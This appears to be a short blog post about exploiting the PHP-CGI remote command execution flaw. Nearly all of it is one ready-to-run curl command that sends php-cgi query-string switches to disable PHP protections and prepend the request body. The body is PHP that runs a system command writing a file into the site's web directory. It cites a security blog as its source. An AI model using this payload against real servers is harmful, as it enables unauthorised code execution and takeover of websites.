Home > Uncategorized > PHP-CGI Remote Command Execution Vulnerability Exploitation

Example:
curl -i -s -k -X 'POST' \
-H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)' \
--data-binary "<?php system(\"echo hey > ../httpdocs/hey.txt\"); die; ?>" \
"http://www.your-website.com/cgi-bin/php5?%2dd+allow_url_include%3don+%2dd+safe_mode%3doff+%2dd+suhosin%2esimulation%3don+%2dd+disable_functions%3d%22%22+%2dd+open_basedir%3dnone+%2dd+auto_prepend_file%3dphp%3a%2f%2finput+%2dd+cgi%2eforce_redirect%3d0+%2dd+cgi%2eredirect_status_env%3d0+%2dn"

Reference: http://www.praetorian.com/blog/php-cgi-remote-command-execution-vulnerability-exploitation



Flag Counter